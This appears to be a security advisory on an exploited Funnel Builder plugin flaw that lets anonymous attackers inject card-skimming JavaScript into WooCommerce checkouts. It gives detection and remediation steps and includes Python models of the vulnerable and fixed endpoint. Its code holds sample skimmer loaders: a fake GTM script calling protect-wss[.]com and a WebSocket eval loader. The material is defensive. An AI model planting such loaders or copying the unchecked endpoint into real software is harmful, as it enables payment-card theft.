Imagine discovering that your WooCommerce store has been quietly sending customer card details to an attacker's server with every checkout. That is the situation for stores running an unpatched copy of the Funnel Builder plugin for WordPress: a critical flaw in it is being actively exploited in the wild, allowing unauthenticated attackers to plant malicious JavaScript on checkout pages. This funnel builder vulnerability is not a theoretical risk; it is a live threat that demands immediate attention.

What Is the Funnel Builder Vulnerability and Why Should You Care?
The Funnel Builder plugin, developed by FunnelKit, is used by over 40,000 WooCommerce stores to build sales funnels and customised checkout experiences. That install base makes it a prime target. The core of the issue is a missing access check: an unauthenticated attacker can store arbitrary JavaScript in the plugin's settings, from where it is rendered on every checkout page of a vulnerable site.
According to a report from the Dutch e-commerce security firm Sansec, the flaw affects all versions of the plugin prior to 3.15.0.3. At the time of writing it has no CVE identifier, which can slow awareness and patching because many scanners and advisories key on CVE numbers. The absence of a CVE does not make the danger any less real: attackers are already exploiting it to steal payment data.
How the Attack Works
The Funnel Builder plugin exposes a public checkout endpoint in which the incoming request names the internal method that should run. In older versions the plugin neither checked the caller's permissions nor restricted which methods could be invoked this way. That missing allowlist and capability check is the heart of the funnel builder vulnerability.
An attacker can therefore send an unauthenticated request that reaches an internal method meant for administrators, one that writes attacker-controlled data into the plugin's global settings in the database. Once saved, that data is rendered into every Funnel Builder checkout page. The result is a persistent JavaScript payload that executes on every transaction without touching a single file on disk.
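The bug class described above, modelled in Python as an added illustration for this article (it is not the Funnel Builder plugin's code, and the class, method and setting names are assumptions chosen to mirror the description). The vulnerable endpoint resolves whatever method name the request supplies and runs it for any caller; the hardened version keeps an explicit allowlist per privilege level and checks the caller before a privileged write, which is the generic shape of "permission checks and method restrictions".

```python
"""Model of an endpoint that lets the request pick which internal method runs.
Added example, not the plugin's code; names and request shape are assumptions."""
from dataclasses import dataclass, field


@dataclass
class Request:
    """Assumed shape of an incoming request: who is calling and what they ask for."""
    is_admin: bool            # False for an anonymous visitor
    method: str               # caller-chosen name of the internal method
    params: dict = field(default_factory=dict)


class VulnerableCheckoutEndpoint:
    """Before the fix: any request reaches any method, including the one that
    writes the global settings rendered into every checkout page."""

    def __init__(self):
        self.settings = {"external_scripts": []}  # stands in for the database row

    # Intended to be reachable by anyone: read-only, harmless.
    def get_checkout_fields(self, params):
        return ["billing_email", "billing_name"]

    # Intended for administrators only: persists attacker-controlled data.
    def save_global_settings(self, params):
        self.settings.update(params)
        return {"saved": True}

    def handle(self, req: Request):
        # The request names the method; nothing checks who is asking.
        target = getattr(self, req.method)
        return target(req.params)


class HardenedCheckoutEndpoint(VulnerableCheckoutEndpoint):
    """After the fix: an allowlist per privilege level, and unknown names are
    rejected instead of being resolved to arbitrary attributes."""

    PUBLIC_METHODS = {"get_checkout_fields"}
    ADMIN_METHODS = {"save_global_settings"}

    def handle(self, req: Request):
        if req.method in self.PUBLIC_METHODS:
            allowed = True
        elif req.method in self.ADMIN_METHODS:
            allowed = req.is_admin  # capability check before a privileged write
        else:
            allowed = False
        if not allowed:
            raise PermissionError(f"method {req.method!r} not permitted for this caller")
        return getattr(self, req.method)(req.params)


# Constructed payload: a GTM-style loader whose host is not Google's (defanged).
FAKE_GTM = '<script src="https://protect-wss[.]com/gtm.js?id=GTM-XXXX"></script>'


def render_checkout_page(endpoint) -> str:
    """Every checkout page includes whatever the stored settings hold."""
    scripts = "\n".join(endpoint.settings["external_scripts"])
    return f"<html><body>{scripts}<form id='checkout'></form></body></html>"


def anonymous_attack(endpoint) -> bool:
    """Unauthenticated request that tries to plant the skimmer.
    Returns True if the payload ends up on the rendered checkout page."""
    req = Request(is_admin=False, method="save_global_settings",
                  params={"external_scripts": [FAKE_GTM]})
    try:
        endpoint.handle(req)
    except PermissionError:
        return False
    return FAKE_GTM in render_checkout_page(endpoint)


if __name__ == "__main__":
    print("vulnerable endpoint compromised:", anonymous_attack(VulnerableCheckoutEndpoint()))
    print("hardened endpoint compromised:  ", anonymous_attack(HardenedCheckoutEndpoint()))
```

The point to take from the model is that the fix is not "validate the method name is a string"; it is that the set of reachable methods must be enumerated, and the privileged ones gated on the caller's capability, before any name supplied by the request is looked up.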
5 Signs of Active Skimming: How to Spot a Compromised Checkout
Detecting a payment skimmer disguised as legitimate analytics can be challenging. Attackers have become skilled at blending in. Here are five telltale signs that your store might be under active attack from this specific funnel builder vulnerability.
1. Unfamiliar Scripts in the External Scripts Settings
The most direct sign of compromise is finding a script you do not recognize in the plugin's settings. Navigate to Settings > Checkout > External Scripts in your WordPress admin panel. Look for any entry that seems out of place, especially one that looks like a Google Tag Manager (GTM) loader but fetches from a host other than googletagmanager.com.
In at least one observed case, Sansec found a payload masquerading as a standard GTM loader. Instead of loading Google's tag script, it launched JavaScript hosted on a remote attacker-controlled domain. If you see a script referencing a domain like “protect-wss[.]com”, or any other address you did not deliberately add, treat the site as compromised.
2. A Sudden, Unexplained Drop in Checkout Completions
A skimmer is written to stay invisible, but it is still untested third-party code running inside your checkout, and a buggy or over-aggressive one can break the payment flow. Customers may encounter errors, timeouts, or unexpected redirects. If you notice a sudden and unexplained drop in successful transactions, inspect the checkout page's scripts before assuming a platform or gateway problem. The reverse does not hold: a normal conversion rate is no evidence that you are clean, because a well-written skimmer lets the real payment go through while copying the card details.
Consider a hypothetical scenario where a store owner sees a 37% drop in conversion rates over a weekend. A quick check of the External Scripts settings reveals a fake GTM script. The skimmer was causing the checkout to fail for some users, while successfully stealing data from others.
3. Unusual Network Activity During Checkout
If you have access to browser developer tools or a network monitoring solution, you can watch for unusual connections during the checkout process. Open your browser's developer console (F12), switch to the Network tab, and go through a test checkout on your own store. Look for WebSocket connections (the WS filter in most browsers) or HTTP requests to domains you do not recognize.
The attacker's skimmer often opens a WebSocket connection to a command-and-control (C2) server, through which it retrieves a payload tailored to your specific storefront. A WebSocket to an unfamiliar IP address or domain during checkout is a strong indicator, but check it against your inventory of legitimate third-party services first: live-chat widgets, fraud-scoring tools and some analytics products also use WebSockets. A connection you cannot attribute to anything you installed is the skimmer.
4. Customer Complaints About Suspicious Redirects or Pop-ups
Your customers are often the first line of defense. If customers start reporting strange behavior during checkout, take it seriously. Complaints about being redirected to unfamiliar pages, seeing unexpected pop-ups, or having their browser behave oddly are all red flags. Attackers sometimes use the injected JavaScript to redirect users to phishing pages or to display fake error messages that request additional personal information.
One store owner reported that several customers called to say they were asked to “verify their identity” by entering their Social Security number after completing a purchase. This was a direct result of a skimmer that had been injected via the Funnel Builder plugin. The attacker was trying to harvest even more data than just credit card numbers.
5. Unexplained Changes to Your Store’s Behavior or Content
The injected JavaScript can do more than just steal credit card data. Depending on the instructions sent by the attacker’s C2 server, the script can change the behavior of your entire site. It can inject spam links, display fake promotions, or redirect visitors to malicious websites. This is because the script acts as a remote loader, contacting an external server, sending information about your site, and waiting for instructions.
This approach allows attackers to change the compromised website’s behavior at any time without modifying your local files. If you notice strange content appearing on your site, such as spammy product links or unexpected redirects, it could be a sign that a skimmer is active and receiving new instructions from its operator.
Why This Vulnerability Is So Dangerous
The danger of this particular flaw goes beyond the immediate theft of payment data. Several factors make it especially concerning for store owners.
No Authentication Required
The attacker does not need any login credentials to exploit this vulnerability. They do not need to be an administrator, an editor, or even a registered user. Any unauthenticated visitor to your site can send the malicious request that plants the skimmer. This dramatically lowers the barrier for attackers and makes the vulnerability easy to exploit at scale.
Persistence Without File Modification
Traditional website malware leaves traces in your site's files, and file integrity monitoring can flag the change. This attack instead writes the payload into the plugin's settings in the database, so file scanners see nothing. The payload also survives deleting and reinstalling the plugin, because plugin settings stay in the database unless the plugin's uninstall routine explicitly removes them. Detection therefore has to look at stored options, not just files.
Disguised as Legitimate Analytics
Sansec noted that “dressing skimmers up as Google Analytics or Tag Manager code is a recurring Magecart pattern, since reviewers tend to skim straight past anything that looks like a familiar tracking tag.” This is a psychological trick. Site owners and security reviewers are so accustomed to seeing analytics scripts that they often overlook them. A fake GTM script sitting next to your real analytics tag can easily go unnoticed for weeks or months.
How to Fix the Funnel Builder Vulnerability
If you use the Funnel Builder plugin, you need to act immediately. The fix is straightforward, but it must be done carefully.
Step 1: Update the Plugin Immediately
FunnelKit has fixed the flaw in version 3.15.0.3. Go to your WordPress admin dashboard and navigate to Plugins > Installed Plugins. Find Funnel Builder and check your current version. If it is below 3.15.0.3, click “Update Now”. If you have automatic updates enabled, confirm that the update actually applied, since auto-updates can fail silently on some hosts.
For developers managing multiple stores, the installed version can be read programmatically from the “Version:” line of the plugin's main file header, or listed with WP-CLI (“wp plugin list”), and a script can flag every site still below 3.15.0.3. Speed is critical here, as active exploitation is already underway.
Step 2: Audit Your External Scripts Settings
After updating, you must check for existing compromise. Navigate to Settings > Checkout > External Scripts in the Funnel Builder settings. Look carefully at every script listed. If you see any script that you did not add yourself, or any script that looks suspicious, remove it immediately.
Pay special attention to anything that looks like a Google Tag Manager loader. The host in the script URL must be googletagmanager.com (or www.googletagmanager.com); a different host, even one that contains the string “googletagmanager”, is almost certainly malicious. Remove it and run a full security scan of your site.
Step 3: Scan for Existing Malicious Code
Even after removing the fake script from the settings, scan the whole site for remaining malicious code. Use a reputable WordPress security plugin that includes a malware scanner, and search the database, in particular the wp_options table where plugin settings live, for references to known malicious domains such as “protect-wss[.]com” and for JavaScript that opens WebSocket connections to unfamiliar hosts. Because the injected script is only a loader, the domain it contacts may be the only indicator present on your site; the actual skimming code is served from the attacker's server.
If you find evidence of compromise, you need to take additional steps. Change all admin passwords, revoke all API keys, and notify your payment processor. You may also need to inform affected customers, depending on your local data breach notification laws.
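Steps 1 to 3 above, as a single audit script written for this article (added example, not FunnelKit's code; the plugin header text, the three External Scripts entries and the indicator list are constructed, and the “Funnel Builder” plugin name in the header is assumed). It reads the “Version:” header and compares it with 3.15.0.3, then inspects each script entry for a GTM look-alike fetching from a non-Google host, a known indicator domain, or a WebSocket-based remote loader (the same checks sign #1 and sign #3 describe by hand). Indicators are written defanged, as in the text, and normalised before matching.

```python
"""Audit helpers: plugin version check plus External Scripts inspection.
Added example for this article; sample data below is constructed."""
import re

FIXED_VERSION = "3.15.0.3"            # first patched release named in the report
GTM_HOST = "googletagmanager.com"      # the only legitimate host for a GTM loader
IOC_DOMAINS = {"protect-wss.com"}      # indicator from the report, undefanged here


def undefang(text: str) -> str:
    """Turn 'protect-wss[.]com' style notation back into a real hostname."""
    return text.replace("[.]", ".").replace("hxxp", "http")


def parse_plugin_version(main_file: str):
    """Read the 'Version:' line of a WordPress plugin main-file header."""
    m = re.search(r"^\s*\*?\s*Version:\s*([0-9][0-9A-Za-z.\-]*)", main_file, re.M)
    return m.group(1) if m else None


def version_tuple(v: str, width: int = 4):
    """'3.14.2' -> (3, 14, 2, 0): numeric compare that copes with 3- and 4-part versions."""
    parts = []
    for p in v.split("."):
        m = re.match(r"\d+", p)
        parts.append(int(m.group()) if m else 0)
    return tuple(parts + [0] * (width - len(parts)))[:width]


def is_vulnerable(version: str) -> bool:
    """All releases before the fixed one are affected, per the report."""
    return version_tuple(version) < version_tuple(FIXED_VERSION)


URL_HOST = re.compile(r"(?:https?|wss?)://([A-Za-z0-9.\-]+)", re.I)


def extract_hosts(snippet: str):
    """Every http(s)/ws(s) host referenced in a script entry, lower-cased."""
    return sorted({h.lower() for h in URL_HOST.findall(undefang(snippet))})


def is_gtm_host(host: str) -> bool:
    # Exact host or a real subdomain; 'googletagmanager.com.evil.example' fails this.
    return host == GTM_HOST or host.endswith("." + GTM_HOST)


def audit_script(snippet: str):
    """Findings for one External Scripts entry (empty list means nothing flagged)."""
    findings = []
    text = undefang(snippet)
    looks_like_gtm = "gtm.js" in text or "GTM-" in text
    for h in extract_hosts(text):
        if looks_like_gtm and not is_gtm_host(h):
            findings.append(f"GTM-style loader fetching from non-Google host {h}")
        if h in IOC_DOMAINS:
            findings.append(f"known indicator domain {h}")
    if re.search(r"\bnew\s+WebSocket\s*\(", text):
        findings.append("opens a WebSocket (remote-loader behaviour; verify the endpoint)")
    return findings


def audit_external_scripts(entries):
    """Audit every entry; returns [(index, hosts, findings)] for flagged entries only."""
    flagged = []
    for i, entry in enumerate(entries):
        findings = audit_script(entry)
        if findings:
            flagged.append((i, extract_hosts(entry), findings))
    return flagged


# Constructed samples: a plugin main-file header and three External Scripts entries.
PLUGIN_MAIN_FILE = """<?php
/**
 * Plugin Name: Funnel Builder
 * Version: 3.14.2
 */
"""
REAL_GTM = ("<script>(function(w,d,s,l,i){var j=d.createElement(s);"
            "j.src='https://www.googletagmanager.com/gtm.js?id='+i;"
            "d.head.appendChild(j);})(window,document,'script','dataLayer','GTM-ABC123');</script>")
FAKE_GTM = REAL_GTM.replace("https://www.googletagmanager.com/", "https://protect-wss[.]com/")
WS_LOADER = ("<script>var s=new WebSocket('wss://203.0.113.7/ws');"
             "s.onmessage=function(e){(0,eval)(e.data)};</script>")
SAMPLE_ENTRIES = [REAL_GTM, FAKE_GTM, WS_LOADER]

if __name__ == "__main__":
    v = parse_plugin_version(PLUGIN_MAIN_FILE)
    print(f"installed {v}: {'VULNERABLE, update now' if is_vulnerable(v) else 'patched'}")
    for idx, hosts, findings in audit_external_scripts(SAMPLE_ENTRIES):
        print(f"entry {idx} hosts={hosts}")
        for f in findings:
            print("   -", f)
```

To run this against a real store, feed parse_plugin_version the contents of the plugin's main PHP file and audit_external_scripts the list of entries exported from Settings > Checkout > External Scripts (or pulled from wp_options). The host comparison is deliberately exact: a loader that merely contains “googletagmanager” in its URL path or in a look-alike hostname is still flagged.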
Step 4: Monitor for Future Vulnerabilities
This incident highlights a broader issue with plugin security. The vulnerability lifecycle — discovery, disclosure, patching, and exploitation — is a constant cycle. To protect your store long-term, you need a proactive security strategy.
Enable automatic updates for all plugins whenever possible. Subscribe to security mailing lists that track WordPress vulnerabilities. Consider using a web application firewall (WAF) that can block exploitation attempts even before patches are applied. Regularly audit your plugin list and remove any that are no longer maintained.
Broader Context: A Pattern of Abuse
This attack on Funnel Builder is not an isolated incident. It is part of a larger pattern of attackers exploiting trust in popular plugins and services. Just weeks before this disclosure, security firm Sucuri detailed a campaign where Joomla websites were being backdoored with heavily obfuscated PHP code. That campaign aimed to contact attacker-controlled C2 servers, receive instructions, and serve spammy content to visitors and search engines.
The similarities are striking. In both cases the injected code acts as a remote loader: it contacts an external server, sends information about the infected website, and waits for instructions, and the server's response determines what the infected site serves. This lets the attacker change the compromised site's behavior at any time without modifying it again.
For WooCommerce store owners, the lesson is clear. The tools you rely on to run your business can also become the vector for devastating attacks. The funnel builder vulnerability is a stark reminder that security is not a one-time task but an ongoing process.
What If You Have Already Been Hacked?
If you suspect that your store has already been compromised, do not panic. Take these steps immediately.
Disconnect and Contain
First, temporarily deactivate the Funnel Builder plugin to stop the skimmer from executing. This will interrupt your checkout process, but it also stops the data theft. Deactivation does not delete the malicious settings entry, so remove it explicitly, and update the plugin to 3.15.0.3 before reactivating it. Next, change all passwords for your WordPress admin accounts, database users, and FTP/SFTP accounts. Revoke any API keys that may have been exposed.
Notify Your Payment Processor
Contact your payment gateway provider. They can monitor for fraudulent transactions and may be able to help you identify affected customers. Depending on your agreement with them, they may also require you to complete a security audit before they allow you to continue processing payments.
Consider Legal Obligations
Depending on your location and the jurisdictions of your customers, you may have legal obligations to report a data breach. In the European Union, the GDPR requires notification within 72 hours. In the United States, laws vary by state. Consult with a legal professional who specializes in data privacy to understand your responsibilities.
Restore from a Clean Backup
If you have a clean backup from before the compromise, consider restoring your site from it. Make sure the backup predates the compromise and that you restore the database, not just the files: the payload lives in the plugin's settings in the database, so a file-only restore leaves it in place. After restoration, update the Funnel Builder plugin to the patched version before reactivating it.
Is It Safe to Keep Using Funnel Builder After the Patch?
Yes. Version 3.15.0.3 closes this specific flaw: FunnelKit added permission checks and restricted which methods the checkout endpoint can invoke. The plugin remains a valuable tool for building effective sales funnels.
However, you should remain vigilant. No plugin is immune to future vulnerabilities. Maintain a habit of regular updates, periodic security audits, and monitoring for unusual activity. The trust you place in your tools must be balanced with a healthy skepticism and a proactive security posture.
The funnel builder vulnerability is a wake-up call for the WooCommerce ecosystem. With over 40,000 stores potentially at risk and exploitation already underway, the window for patching is narrow, and unpatched sites will keep being found and compromised. Update now, audit your checkout scripts, and protect your store, your customers, and your reputation.